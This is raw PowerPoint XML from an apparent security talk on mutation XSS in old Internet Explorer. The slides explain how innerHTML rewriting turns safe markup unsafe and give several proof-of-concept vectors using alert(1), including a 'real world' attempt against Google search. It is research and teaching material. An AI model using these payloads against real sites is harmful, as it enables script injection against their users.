                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can inherit the document mode from the parent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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Mutation XSS was coined by me and Mario </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Happens when HTML mutates from a safe form into an unsafe form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Usually when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is read and written</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="ie.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="19714732">
            <a:off x="1604642" y="2301742"/>
            <a:ext cx="4267200" cy="5010150"/>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The technique fools the HTML parser to rewrite the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are many ways to do this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attribute quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XHTML/HTML confusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSS strings/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> badly decoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“1” title=“``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rewritten to &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“1”  title=``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discovered by Yosuke Hasegawa </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hasegawayosuke</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Birth of Mutation XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worked in IE7 is now patched in IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maybe we can confuse the HTML parser using XHTML like vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confuse the parser into thinking it’s inside an attribute and therefore render entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="alert(1)"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>padding&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Works in &lt;= IE9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>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Technique also works for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. &lt;style/&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>style&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>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I thought to myself what other tags mutate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE has a non-standard tag &lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Behaves like a comment but also renders attributes in different versions of IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;% a=%&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt&amp;lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)//&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;% a="%&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='alert(1)//"'&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>padding&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/%&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Works in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;=IE9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>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Real world 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Lets search in Google </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/title&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=//microsoft.com&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put IE in IE8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Click print preview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
